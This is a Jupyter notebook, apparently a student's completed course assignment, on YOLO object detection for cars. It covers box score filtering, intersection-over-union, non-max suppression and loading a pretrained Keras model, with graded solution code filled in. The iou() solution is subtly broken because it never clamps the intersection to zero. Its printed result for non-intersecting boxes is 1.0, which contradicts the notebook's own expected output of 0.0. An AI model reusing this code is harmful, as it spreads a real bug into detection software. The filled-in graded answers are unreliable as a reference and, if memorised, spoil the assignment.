"**Important Note**: As you can see, we import Keras's backend as K. This means that to use a Keras function in this notebook, you will need to write: `K.function(...)`.",
"_____no_output_____"
],
[
"## 1 - Problem Statement\n\nYou are working on a self-driving car. As a critical component of this project, you'd like to first build a car detection system. To collect data, you've mounted a camera to the hood (meaning the front) of the car, which takes pictures of the road ahead every few seconds while you drive around. \n\n<center>\n<video width=\"400\" height=\"200\" src=\"nb_images/road_video_compressed2.mp4\" type=\"video/mp4\" controls>\n</video>\n</center>\n\n<caption><center> Pictures taken from a car-mounted camera while driving around Silicon Valley. <br> We thank [drive.ai](htps://www.drive.ai/) for providing this dataset.\n</center></caption>\n\nYou've gathered all these images into a folder and have labelled them by drawing bounding boxes around every car you found. Here's an example of what your bounding boxes look like.\n\n<img src=\"nb_images/box_label.png\" style=\"width:500px;height:250;\">\n<caption><center> <u> **Figure 1** </u>: **Definition of a box**<br> </center></caption>\n\nIf you have 80 classes that you want the object detector to recognize, you can represent the class label $c$ either as an integer from 1 to 80, or as an 80-dimensional vector (with 80 numbers) one component of which is 1 and the rest of which are 0. The video lectures had used the latter representation; in this notebook, we will use both representations, depending on which is more convenient for a particular step. \n\nIn this exercise, you will learn how \"You Only Look Once\" (YOLO) performs object detection, and then apply it to car detection. Because the YOLO model is very computationally expensive to train, we will load pre-trained weights for you to use. ",
"_____no_output_____"
],
[
"## 2 - YOLO",
"_____no_output_____"
],
[
"\"You Only Look Once\" (YOLO) is a popular algorithm because it achieves high accuracy while also being able to run in real-time. This algorithm \"only looks once\" at the image in the sense that it requires only one forward propagation pass through the network to make predictions. After non-max suppression, it then outputs recognized objects together with the bounding boxes.\n\n### 2.1 - Model details\n\n#### Inputs and outputs\n- The **input** is a batch of images, and each image has the shape (m, 608, 608, 3)\n- The **output** is a list of bounding boxes along with the recognized classes. Each bounding box is represented by 6 numbers $(p_c, b_x, b_y, b_h, b_w, c)$ as explained above. If you expand $c$ into an 80-dimensional vector, each bounding box is then represented by 85 numbers. \n\n#### Anchor Boxes\n* Anchor boxes are chosen by exploring the training data to choose reasonable height/width ratios that represent the different classes. For this assignment, 5 anchor boxes were chosen for you (to cover the 80 classes), and stored in the file './model_data/yolo_anchors.txt'\n* The dimension for anchor boxes is the second to last dimension in the encoding: $(m, n_H,n_W,anchors,classes)$.\n* The YOLO architecture is: IMAGE (m, 608, 608, 3) -> DEEP CNN -> ENCODING (m, 19, 19, 5, 85). \n\n\n#### Encoding\nLet's look in greater detail at what this encoding represents. \n\n<img src=\"nb_images/architecture.png\" style=\"width:700px;height:400;\">\n<caption><center> <u> **Figure 2** </u>: **Encoding architecture for YOLO**<br> </center></caption>\n\nIf the center/midpoint of an object falls into a grid cell, that grid cell is responsible for detecting that object.",
"_____no_output_____"
],
[
"Since we are using 5 anchor boxes, each of the 19 x19 cells thus encodes information about 5 boxes. Anchor boxes are defined only by their width and height.\n\nFor simplicity, we will flatten the last two last dimensions of the shape (19, 19, 5, 85) encoding. So the output of the Deep CNN is (19, 19, 425).\n\n<img src=\"nb_images/flatten.png\" style=\"width:700px;height:400;\">\n<caption><center> <u> **Figure 3** </u>: **Flattening the last two last dimensions**<br> </center></caption>",
"_____no_output_____"
],
[
"#### Class score\n\nNow, for each box (of each cell) we will compute the following element-wise product and extract a probability that the box contains a certain class. \nThe class score is $score_{c,i} = p_{c} \\times c_{i}$: the probability that there is an object $p_{c}$ times the probability that the object is a certain class $c_{i}$.\n\n<img src=\"nb_images/probability_extraction.png\" style=\"width:700px;height:400;\">\n<caption><center> <u> **Figure 4** </u>: **Find the class detected by each box**<br> </center></caption>\n\n##### Example of figure 4\n* In figure 4, let's say for box 1 (cell 1), the probability that an object exists is $p_{1}=0.60$. So there's a 60% chance that an object exists in box 1 (cell 1). \n* The probability that the object is the class \"category 3 (a car)\" is $c_{3}=0.73$. \n* The score for box 1 and for category \"3\" is $score_{1,3}=0.60 \\times 0.73 = 0.44$. \n* Let's say we calculate the score for all 80 classes in box 1, and find that the score for the car class (class 3) is the maximum. So we'll assign the score 0.44 and class \"3\" to this box \"1\".\n\n#### Visualizing classes\nHere's one way to visualize what YOLO is predicting on an image:\n- For each of the 19x19 grid cells, find the maximum of the probability scores (taking a max across the 80 classes, one maximum for each of the 5 anchor boxes).\n- Color that grid cell according to what object that grid cell considers the most likely.\n\nDoing this results in this picture: \n\n<img src=\"nb_images/proba_map.png\" style=\"width:300px;height:300;\">\n<caption><center> <u> **Figure 5** </u>: Each one of the 19x19 grid cells is colored according to which class has the largest predicted probability in that cell.<br> </center></caption>\n\nNote that this visualization isn't a core part of the YOLO algorithm itself for making predictions; it's just a nice way of visualizing an intermediate result of the algorithm. \n",
"_____no_output_____"
],
[
"#### Visualizing bounding boxes\nAnother way to visualize YOLO's output is to plot the bounding boxes that it outputs. Doing that results in a visualization like this: \n\n<img src=\"nb_images/anchor_map.png\" style=\"width:200px;height:200;\">\n<caption><center> <u> **Figure 6** </u>: Each cell gives you 5 boxes. In total, the model predicts: 19x19x5 = 1805 boxes just by looking once at the image (one forward pass through the network)! Different colors denote different classes. <br> </center></caption>\n\n#### Non-Max suppression\nIn the figure above, we plotted only boxes for which the model had assigned a high probability, but this is still too many boxes. You'd like to reduce the algorithm's output to a much smaller number of detected objects. \n\nTo do so, you'll use **non-max suppression**. Specifically, you'll carry out these steps: \n- Get rid of boxes with a low score (meaning, the box is not very confident about detecting a class; either due to the low probability of any object, or low probability of this particular class).\n- Select only one box when several boxes overlap with each other and detect the same object.\n\n",
"_____no_output_____"
],
[
"### 2.2 - Filtering with a threshold on class scores\n\nYou are going to first apply a filter by thresholding. You would like to get rid of any box for which the class \"score\" is less than a chosen threshold. \n\nThe model gives you a total of 19x19x5x85 numbers, with each box described by 85 numbers. It is convenient to rearrange the (19,19,5,85) (or (19,19,425)) dimensional tensor into the following variables: \n- `box_confidence`: tensor of shape $(19 \\times 19, 5, 1)$ containing $p_c$ (confidence probability that there's some object) for each of the 5 boxes predicted in each of the 19x19 cells.\n- `boxes`: tensor of shape $(19 \\times 19, 5, 4)$ containing the midpoint and dimensions $(b_x, b_y, b_h, b_w)$ for each of the 5 boxes in each cell.\n- `box_class_probs`: tensor of shape $(19 \\times 19, 5, 80)$ containing the \"class probabilities\" $(c_1, c_2, ... c_{80})$ for each of the 80 classes for each of the 5 boxes per cell.\n\n#### **Exercise**: Implement `yolo_filter_boxes()`.\n1. Compute box scores by doing the elementwise product as described in Figure 4 ($p \\times c$). \nThe following code may help you choose the right operator: \n```python\na = np.random.randn(19*19, 5, 1)\nb = np.random.randn(19*19, 5, 80)\nc = a * b # shape of c will be (19*19, 5, 80)\n```\nThis is an example of **broadcasting** (multiplying vectors of different sizes).\n\n2. For each box, find:\n - the index of the class with the maximum box score\n - the corresponding box score\n \n **Useful references**\n * [Keras argmax](https://keras.io/backend/#argmax)\n * [Keras max](https://keras.io/backend/#max)\n\n **Additional Hints**\n * For the `axis` parameter of `argmax` and `max`, if you want to select the **last** axis, one way to do so is to set `axis=-1`. This is similar to Python array indexing, where you can select the last position of an array using `arrayname[-1]`.\n * Applying `max` normally collapses the axis for which the maximum is applied. `keepdims=False` is the default option, and allows that dimension to be removed. We don't need to keep the last dimension after applying the maximum here.\n * Even though the documentation shows `keras.backend.argmax`, use `keras.argmax`. Similarly, use `keras.max`.\n\n\n3. Create a mask by using a threshold. As a reminder: `([0.9, 0.3, 0.4, 0.5, 0.1] < 0.4)` returns: `[False, True, False, False, True]`. The mask should be True for the boxes you want to keep. \n\n4. Use TensorFlow to apply the mask to `box_class_scores`, `boxes` and `box_classes` to filter out the boxes we don't want. You should be left with just the subset of boxes you want to keep. \n\n **Useful reference**:\n * [boolean mask](https://www.tensorflow.org/api_docs/python/tf/boolean_mask) \n\n **Additional Hints**: \n * For the `tf.boolean_mask`, we can keep the default `axis=None`.\n\n**Reminder**: to call a Keras function, you should use `K.function(...)`.",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: yolo_filter_boxes\n\ndef yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = .6):\n \"\"\"Filters YOLO boxes by thresholding on object and class confidence.\n \n Arguments:\n box_confidence -- tensor of shape (19, 19, 5, 1)\n boxes -- tensor of shape (19, 19, 5, 4)\n box_class_probs -- tensor of shape (19, 19, 5, 80)\n threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box\n \n Returns:\n scores -- tensor of shape (None,), containing the class probability score for selected boxes\n boxes -- tensor of shape (None, 4), containing (b_x, b_y, b_h, b_w) coordinates of selected boxes\n classes -- tensor of shape (None,), containing the index of the class detected by the selected boxes\n \n Note: \"None\" is here because you don't know the exact number of selected boxes, as it depends on the threshold. \n For example, the actual output size of scores would be (10,) if there are 10 boxes.\n \"\"\"\n \n # Step 1: Compute box scores\n ### START CODE HERE ### (≈ 1 line)\n box_scores = np.multiply(box_confidence, box_class_probs)\n ### END CODE HERE ###\n \n # Step 2: Find the box_classes using the max box_scores, keep track of the corresponding score\n ### START CODE HERE ### (≈ 2 lines)\n box_classes = K.argmax(box_scores, axis=-1)\n box_class_scores = K.max(box_scores, axis=-1)\n ### END CODE HERE ###\n \n # Step 3: Create a filtering mask based on \"box_class_scores\" by using \"threshold\". The mask should have the\n # same dimension as box_class_scores, and be True for the boxes you want to keep (with probability >= threshold)\n ### START CODE HERE ### (≈ 1 line)\n filtering_mask = box_class_scores >= threshold\n ### END CODE HERE ###\n \n # Step 4: Apply the mask to box_class_scores, boxes and box_classes\n ### START CODE HERE ### (≈ 3 lines)\n scores = tf.boolean_mask(box_class_scores, filtering_mask)\n boxes = tf.boolean_mask(boxes, filtering_mask)\n classes = tf.boolean_mask(box_classes, filtering_mask)\n ### END CODE HERE ###\n \n return scores, boxes, classes",
"_____no_output_____"
],
[
"with tf.Session() as test_a:\n box_confidence = tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1)\n boxes = tf.random_normal([19, 19, 5, 4], mean=1, stddev=4, seed = 1)\n box_class_probs = tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1)\n scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = 0.5)\n print(\"scores[2] = \" + str(scores[2].eval()))\n print(\"boxes[2] = \" + str(boxes[2].eval()))\n print(\"classes[2] = \" + str(classes[2].eval()))\n print(\"scores.shape = \" + str(scores.shape))\n print(\"boxes.shape = \" + str(boxes.shape))\n print(\"classes.shape = \" + str(classes.shape))",
"scores[2] = 10.7506\nboxes[2] = [ 8.42653275 3.27136683 -0.5313437 -4.94137383]\nclasses[2] = 7\nscores.shape = (?,)\nboxes.shape = (?, 4)\nclasses.shape = (?,)\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **scores[2]**\n </td>\n <td>\n 10.7506\n </td>\n </tr>\n <tr>\n <td>\n **boxes[2]**\n </td>\n <td>\n [ 8.42653275 3.27136683 -0.5313437 -4.94137383]\n </td>\n </tr>\n\n <tr>\n <td>\n **classes[2]**\n </td>\n <td>\n 7\n </td>\n </tr>\n <tr>\n <td>\n **scores.shape**\n </td>\n <td>\n (?,)\n </td>\n </tr>\n <tr>\n <td>\n **boxes.shape**\n </td>\n <td>\n (?, 4)\n </td>\n </tr>\n\n <tr>\n <td>\n **classes.shape**\n </td>\n <td>\n (?,)\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"**Note** In the test for `yolo_filter_boxes`, we're using random numbers to test the function. In real data, the `box_class_probs` would contain non-zero values between 0 and 1 for the probabilities. The box coordinates in `boxes` would also be chosen so that lengths and heights are non-negative.",
"_____no_output_____"
],
[
"### 2.3 - Non-max suppression ###\n\nEven after filtering by thresholding over the class scores, you still end up with a lot of overlapping boxes. A second filter for selecting the right boxes is called non-maximum suppression (NMS). ",
"_____no_output_____"
],
[
"<img src=\"nb_images/non-max-suppression.png\" style=\"width:500px;height:400;\">\n<caption><center> <u> **Figure 7** </u>: In this example, the model has predicted 3 cars, but it's actually 3 predictions of the same car. Running non-max suppression (NMS) will select only the most accurate (highest probability) of the 3 boxes. <br> </center></caption>\n",
"_____no_output_____"
],
[
"Non-max suppression uses the very important function called **\"Intersection over Union\"**, or IoU.\n<img src=\"nb_images/iou.png\" style=\"width:500px;height:400;\">\n<caption><center> <u> **Figure 8** </u>: Definition of \"Intersection over Union\". <br> </center></caption>\n\n#### **Exercise**: Implement iou(). Some hints:\n- In this code, we use the convention that (0,0) is the top-left corner of an image, (1,0) is the upper-right corner, and (1,1) is the lower-right corner. In other words, the (0,0) origin starts at the top left corner of the image. As x increases, we move to the right. As y increases, we move down.\n- For this exercise, we define a box using its two corners: upper left $(x_1, y_1)$ and lower right $(x_2,y_2)$, instead of using the midpoint, height and width. (This makes it a bit easier to calculate the intersection).\n- To calculate the area of a rectangle, multiply its height $(y_2 - y_1)$ by its width $(x_2 - x_1)$. (Since $(x_1,y_1)$ is the top left and $x_2,y_2$ are the bottom right, these differences should be non-negative.\n- To find the **intersection** of the two boxes $(xi_{1}, yi_{1}, xi_{2}, yi_{2})$: \n - Feel free to draw some examples on paper to clarify this conceptually.\n - The top left corner of the intersection $(xi_{1}, yi_{1})$ is found by comparing the top left corners $(x_1, y_1)$ of the two boxes and finding a vertex that has an x-coordinate that is closer to the right, and y-coordinate that is closer to the bottom.\n - The bottom right corner of the intersection $(xi_{2}, yi_{2})$ is found by comparing the bottom right corners $(x_2,y_2)$ of the two boxes and finding a vertex whose x-coordinate is closer to the left, and the y-coordinate that is closer to the top.\n - The two boxes **may have no intersection**. You can detect this if the intersection coordinates you calculate end up being the top right and/or bottom left corners of an intersection box. Another way to think of this is if you calculate the height $(y_2 - y_1)$ or width $(x_2 - x_1)$ and find that at least one of these lengths is negative, then there is no intersection (intersection area is zero). \n - The two boxes may intersect at the **edges or vertices**, in which case the intersection area is still zero. This happens when either the height or width (or both) of the calculated intersection is zero.\n\n\n**Additional Hints**\n\n- `xi1` = **max**imum of the x1 coordinates of the two boxes\n- `yi1` = **max**imum of the y1 coordinates of the two boxes\n- `xi2` = **min**imum of the x2 coordinates of the two boxes\n- `yi2` = **min**imum of the y2 coordinates of the two boxes\n- `inter_area` = You can use `max(height, 0)` and `max(width, 0)`\n",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: iou\n\ndef iou(box1, box2):\n \"\"\"Implement the intersection over union (IoU) between box1 and box2\n \n Arguments:\n box1 -- first box, list object with coordinates (box1_x1, box1_y1, box1_x2, box_1_y2)\n box2 -- second box, list object with coordinates (box2_x1, box2_y1, box2_x2, box2_y2)\n \"\"\"\n\n # Assign variable names to coordinates for clarity\n (box1_x1, box1_y1, box1_x2, box1_y2) = box1\n (box2_x1, box2_y1, box2_x2, box2_y2) = box2\n \n # Calculate the (yi1, xi1, yi2, xi2) coordinates of the intersection of box1 and box2. Calculate its Area.\n ### START CODE HERE ### (≈ 7 lines)\n xi1 = max(box1[0], box2[0])\n yi1 = max(box1[1], box2[1])\n xi2 = min(box1[2], box2[2])\n yi2 = min(box1[3], box2[3])\n inter_width = (yi2 - yi1)\n inter_height = (xi2 - xi1)\n inter_area = inter_width * inter_height\n ### END CODE HERE ### \n\n # Calculate the Union area by using Formula: Union(A,B) = A + B - Inter(A,B)\n ### START CODE HERE ### (≈ 3 lines)\n box1_area = (box1[2] - box1[0]) * (box1[3] - box1[1])\n box2_area = (box2[2] - box2[0]) * (box2[3] - box2[1])\n union_area = box1_area + box2_area - inter_area\n ### END CODE HERE ###\n \n # compute the IoU\n ### START CODE HERE ### (≈ 1 line)\n iou = inter_area / union_area\n ### END CODE HERE ###\n \n return iou",
"_____no_output_____"
],
[
"## Test case 1: boxes intersect\nbox1 = (2, 1, 4, 3)\nbox2 = (1, 2, 3, 4) \nprint(\"iou for intersecting boxes = \" + str(iou(box1, box2)))\n\n## Test case 2: boxes do not intersect\nbox1 = (1,2,3,4)\nbox2 = (5,6,7,8)\nprint(\"iou for non-intersecting boxes = \" + str(iou(box1,box2)))\n\n## Test case 3: boxes intersect at vertices only\nbox1 = (1,1,2,2)\nbox2 = (2,2,3,3)\nprint(\"iou for boxes that only touch at vertices = \" + str(iou(box1,box2)))\n\n## Test case 4: boxes intersect at edge only\nbox1 = (1,1,3,3)\nbox2 = (2,3,3,4)\nprint(\"iou for boxes that only touch at edges = \" + str(iou(box1,box2)))",
"iou for intersecting boxes = 0.14285714285714285\niou for non-intersecting boxes = 1.0\niou for boxes that only touch at vertices = 0.0\niou for boxes that only touch at edges = 0.0\n"
]
],
[
[
"**Expected Output**:\n\n```\niou for intersecting boxes = 0.14285714285714285\niou for non-intersecting boxes = 0.0\niou for boxes that only touch at vertices = 0.0\niou for boxes that only touch at edges = 0.0\n```",
"_____no_output_____"
],
[
"#### YOLO non-max suppression\n\nYou are now ready to implement non-max suppression. The key steps are: \n1. Select the box that has the highest score.\n2. Compute the overlap of this box with all other boxes, and remove boxes that overlap significantly (iou >= `iou_threshold`).\n3. Go back to step 1 and iterate until there are no more boxes with a lower score than the currently selected box.\n\nThis will remove all boxes that have a large overlap with the selected boxes. Only the \"best\" boxes remain.\n\n**Exercise**: Implement yolo_non_max_suppression() using TensorFlow. TensorFlow has two built-in functions that are used to implement non-max suppression (so you don't actually need to use your `iou()` implementation):\n\n** Reference documentation ** \n\n- [tf.image.non_max_suppression()](https://www.tensorflow.org/api_docs/python/tf/image/non_max_suppression)\n```\ntf.image.non_max_suppression(\n boxes,\n scores,\n max_output_size,\n iou_threshold=0.5,\n name=None\n)\n```\nNote that in the version of tensorflow used here, there is no parameter `score_threshold` (it's shown in the documentation for the latest version) so trying to set this value will result in an error message: *got an unexpected keyword argument 'score_threshold.*\n\n- [K.gather()](https://www.tensorflow.org/api_docs/python/tf/keras/backend/gather) \nEven though the documentation shows `tf.keras.backend.gather()`, you can use `keras.gather()`. \n```\nkeras.gather(\n reference,\n indices\n)\n```",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: yolo_non_max_suppression\n\ndef yolo_non_max_suppression(scores, boxes, classes, max_boxes = 10, iou_threshold = 0.5):\n \"\"\"\n Applies Non-max suppression (NMS) to set of boxes\n \n Arguments:\n scores -- tensor of shape (None,), output of yolo_filter_boxes()\n boxes -- tensor of shape (None, 4), output of yolo_filter_boxes() that have been scaled to the image size (see later)\n classes -- tensor of shape (None,), output of yolo_filter_boxes()\n max_boxes -- integer, maximum number of predicted boxes you'd like\n iou_threshold -- real value, \"intersection over union\" threshold used for NMS filtering\n \n Returns:\n scores -- tensor of shape (, None), predicted score for each box\n boxes -- tensor of shape (4, None), predicted box coordinates\n classes -- tensor of shape (, None), predicted class for each box\n \n Note: The \"None\" dimension of the output tensors has obviously to be less than max_boxes. Note also that this\n function will transpose the shapes of scores, boxes, classes. This is made for convenience.\n \"\"\"\n \n max_boxes_tensor = K.variable(max_boxes, dtype='int32') # tensor to be used in tf.image.non_max_suppression()\n K.get_session().run(tf.variables_initializer([max_boxes_tensor])) # initialize variable max_boxes_tensor\n \n # Use tf.image.non_max_suppression() to get the list of indices corresponding to boxes you keep\n ### START CODE HERE ### (≈ 1 line)\n nms_indices = tf.image.non_max_suppression(boxes, scores, max_boxes_tensor, iou_threshold)\n ### END CODE HERE ###\n \n # Use K.gather() to select only nms_indices from scores, boxes and classes\n ### START CODE HERE ### (≈ 3 lines)\n scores = K.gather(scores, nms_indices)\n boxes = K.gather(boxes, nms_indices)\n classes = K.gather(classes, nms_indices)\n ### END CODE HERE ###\n \n return scores, boxes, classes",
"_____no_output_____"
],
[
"with tf.Session() as test_b:\n scores = tf.random_normal([54,], mean=1, stddev=4, seed = 1)\n boxes = tf.random_normal([54, 4], mean=1, stddev=4, seed = 1)\n classes = tf.random_normal([54,], mean=1, stddev=4, seed = 1)\n scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes)\n print(\"scores[2] = \" + str(scores[2].eval()))\n print(\"boxes[2] = \" + str(boxes[2].eval()))\n print(\"classes[2] = \" + str(classes[2].eval()))\n print(\"scores.shape = \" + str(scores.eval().shape))\n print(\"boxes.shape = \" + str(boxes.eval().shape))\n print(\"classes.shape = \" + str(classes.eval().shape))",
"scores[2] = 6.9384\nboxes[2] = [-5.299932 3.13798141 4.45036697 0.95942086]\nclasses[2] = -2.24527\nscores.shape = (10,)\nboxes.shape = (10, 4)\nclasses.shape = (10,)\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **scores[2]**\n </td>\n <td>\n 6.9384\n </td>\n </tr>\n <tr>\n <td>\n **boxes[2]**\n </td>\n <td>\n [-5.299932 3.13798141 4.45036697 0.95942086]\n </td>\n </tr>\n\n <tr>\n <td>\n **classes[2]**\n </td>\n <td>\n -2.24527\n </td>\n </tr>\n <tr>\n <td>\n **scores.shape**\n </td>\n <td>\n (10,)\n </td>\n </tr>\n <tr>\n <td>\n **boxes.shape**\n </td>\n <td>\n (10, 4)\n </td>\n </tr>\n\n <tr>\n <td>\n **classes.shape**\n </td>\n <td>\n (10,)\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"### 2.4 Wrapping up the filtering\n\nIt's time to implement a function taking the output of the deep CNN (the 19x19x5x85 dimensional encoding) and filtering through all the boxes using the functions you've just implemented. \n\n**Exercise**: Implement `yolo_eval()` which takes the output of the YOLO encoding and filters the boxes using score threshold and NMS. There's just one last implementational detail you have to know. There're a few ways of representing boxes, such as via their corners or via their midpoint and height/width. YOLO converts between a few such formats at different times, using the following functions (which we have provided): \n\n```python\nboxes = yolo_boxes_to_corners(box_xy, box_wh) \n```\nwhich converts the yolo box coordinates (x,y,w,h) to box corners' coordinates (x1, y1, x2, y2) to fit the input of `yolo_filter_boxes`\n```python\nboxes = scale_boxes(boxes, image_shape)\n```\nYOLO's network was trained to run on 608x608 images. If you are testing this data on a different size image--for example, the car detection dataset had 720x1280 images--this step rescales the boxes so that they can be plotted on top of the original 720x1280 image. \n\nDon't worry about these two functions; we'll show you where they need to be called. ",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: yolo_eval\n\ndef yolo_eval(yolo_outputs, image_shape = (720., 1280.), max_boxes=10, score_threshold=.6, iou_threshold=.5):\n \"\"\"\n Converts the output of YOLO encoding (a lot of boxes) to your predicted boxes along with their scores, box coordinates and classes.\n \n Arguments:\n yolo_outputs -- output of the encoding model (for image_shape of (608, 608, 3)), contains 4 tensors:\n box_confidence: tensor of shape (None, 19, 19, 5, 1)\n box_xy: tensor of shape (None, 19, 19, 5, 2)\n box_wh: tensor of shape (None, 19, 19, 5, 2)\n box_class_probs: tensor of shape (None, 19, 19, 5, 80)\n image_shape -- tensor of shape (2,) containing the input shape, in this notebook we use (608., 608.) (has to be float32 dtype)\n max_boxes -- integer, maximum number of predicted boxes you'd like\n score_threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box\n iou_threshold -- real value, \"intersection over union\" threshold used for NMS filtering\n \n Returns:\n scores -- tensor of shape (None, ), predicted score for each box\n boxes -- tensor of shape (None, 4), predicted box coordinates\n classes -- tensor of shape (None,), predicted class for each box\n \"\"\"\n \n ### START CODE HERE ### \n \n # Retrieve outputs of the YOLO model (≈1 line)\n box_confidence, box_xy, box_wh, box_class_probs = yolo_outputs\n\n # Convert boxes to be ready for filtering functions (convert boxes box_xy and box_wh to corner coordinates)\n boxes = yolo_boxes_to_corners(box_xy, box_wh)\n\n # Use one of the functions you've implemented to perform Score-filtering with a threshold of score_threshold (≈1 line)\n scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold=score_threshold)\n \n # Scale boxes back to original image shape.\n boxes = scale_boxes(boxes, image_shape)\n\n # Use one of the functions you've implemented to perform Non-max suppression with \n # maximum number of boxes set to max_boxes and a threshold of iou_threshold (≈1 line)\n scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes, max_boxes=max_boxes,\n iou_threshold=iou_threshold)\n \n ### END CODE HERE ###\n \n return scores, boxes, classes",
"_____no_output_____"
],
[
"with tf.Session() as test_b:\n yolo_outputs = (tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1),\n tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),\n tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),\n tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1))\n scores, boxes, classes = yolo_eval(yolo_outputs)\n print(\"scores[2] = \" + str(scores[2].eval()))\n print(\"boxes[2] = \" + str(boxes[2].eval()))\n print(\"classes[2] = \" + str(classes[2].eval()))\n print(\"scores.shape = \" + str(scores.eval().shape))\n print(\"boxes.shape = \" + str(boxes.eval().shape))\n print(\"classes.shape = \" + str(classes.eval().shape))",
"scores[2] = 138.791\nboxes[2] = [ 1292.32971191 -278.52166748 3876.98925781 -835.56494141]\nclasses[2] = 54\nscores.shape = (10,)\nboxes.shape = (10, 4)\nclasses.shape = (10,)\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **scores[2]**\n </td>\n <td>\n 138.791\n </td>\n </tr>\n <tr>\n <td>\n **boxes[2]**\n </td>\n <td>\n [ 1292.32971191 -278.52166748 3876.98925781 -835.56494141]\n </td>\n </tr>\n\n <tr>\n <td>\n **classes[2]**\n </td>\n <td>\n 54\n </td>\n </tr>\n <tr>\n <td>\n **scores.shape**\n </td>\n <td>\n (10,)\n </td>\n </tr>\n <tr>\n <td>\n **boxes.shape**\n </td>\n <td>\n (10, 4)\n </td>\n </tr>\n\n <tr>\n <td>\n **classes.shape**\n </td>\n <td>\n (10,)\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"## Summary for YOLO:\n- Input image (608, 608, 3)\n- The input image goes through a CNN, resulting in a (19,19,5,85) dimensional output. \n- After flattening the last two dimensions, the output is a volume of shape (19, 19, 425):\n - Each cell in a 19x19 grid over the input image gives 425 numbers. \n - 425 = 5 x 85 because each cell contains predictions for 5 boxes, corresponding to 5 anchor boxes, as seen in lecture. \n - 85 = 5 + 80 where 5 is because $(p_c, b_x, b_y, b_h, b_w)$ has 5 numbers, and 80 is the number of classes we'd like to detect\n- You then select only few boxes based on:\n - Score-thresholding: throw away boxes that have detected a class with a score less than the threshold\n - Non-max suppression: Compute the Intersection over Union and avoid selecting overlapping boxes\n- This gives you YOLO's final output. ",
"_____no_output_____"
],
[
"## 3 - Test YOLO pre-trained model on images",
"_____no_output_____"
],
[
"In this part, you are going to use a pre-trained model and test it on the car detection dataset. We'll need a session to execute the computation graph and evaluate the tensors.",
"_____no_output_____"
]
],
[
[
"sess = K.get_session()",
"_____no_output_____"
]
],
[
[
"### 3.1 - Defining classes, anchors and image shape.\n\n* Recall that we are trying to detect 80 classes, and are using 5 anchor boxes. \n* We have gathered the information on the 80 classes and 5 boxes in two files \"coco_classes.txt\" and \"yolo_anchors.txt\". \n* We'll read class names and anchors from text files.\n* The car detection dataset has 720x1280 images, which we've pre-processed into 608x608 images. ",
"_____no_output_____"
]
],
[
[
"class_names = read_classes(\"model_data/coco_classes.txt\")\nanchors = read_anchors(\"model_data/yolo_anchors.txt\")\nimage_shape = (720., 1280.) ",
"_____no_output_____"
]
],
[
[
"### 3.2 - Loading a pre-trained model\n\n* Training a YOLO model takes a very long time and requires a fairly large dataset of labelled bounding boxes for a large range of target classes. \n* You are going to load an existing pre-trained Keras YOLO model stored in \"yolo.h5\". \n* These weights come from the official YOLO website, and were converted using a function written by Allan Zelener. References are at the end of this notebook. Technically, these are the parameters from the \"YOLOv2\" model, but we will simply refer to it as \"YOLO\" in this notebook.\n\nRun the cell below to load the model from this file.",
"_____no_output_____"
]
],
[
[
"yolo_model = load_model(\"model_data/yolo.h5\")",
"/opt/conda/lib/python3.6/site-packages/keras/models.py:251: UserWarning: No training configuration found in save file: the model was *not* compiled. Compile it manually.\n warnings.warn('No training configuration found in save file: '\n"
]
],
[
[
"This loads the weights of a trained YOLO model. Here's a summary of the layers your model contains.",
"_____no_output_____"
]
],
[
[
"yolo_model.summary()",
"____________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n====================================================================================================\ninput_1 (InputLayer) (None, 608, 608, 3) 0 \n____________________________________________________________________________________________________\nconv2d_1 (Conv2D) (None, 608, 608, 32) 864 input_1[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_1 (BatchNorm (None, 608, 608, 32) 128 conv2d_1[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_1 (LeakyReLU) (None, 608, 608, 32) 0 batch_normalization_1[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_1 (MaxPooling2D) (None, 304, 304, 32) 0 leaky_re_lu_1[0][0] \n____________________________________________________________________________________________________\nconv2d_2 (Conv2D) (None, 304, 304, 64) 18432 max_pooling2d_1[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_2 (BatchNorm (None, 304, 304, 64) 256 conv2d_2[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_2 (LeakyReLU) (None, 304, 304, 64) 0 batch_normalization_2[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_2 (MaxPooling2D) (None, 152, 152, 64) 0 leaky_re_lu_2[0][0] \n____________________________________________________________________________________________________\nconv2d_3 (Conv2D) (None, 152, 152, 128) 73728 max_pooling2d_2[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_3 (BatchNorm (None, 152, 152, 128) 512 conv2d_3[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_3 (LeakyReLU) (None, 152, 152, 128) 0 batch_normalization_3[0][0] \n____________________________________________________________________________________________________\nconv2d_4 (Conv2D) (None, 152, 152, 64) 8192 leaky_re_lu_3[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_4 (BatchNorm (None, 152, 152, 64) 256 conv2d_4[0][0] 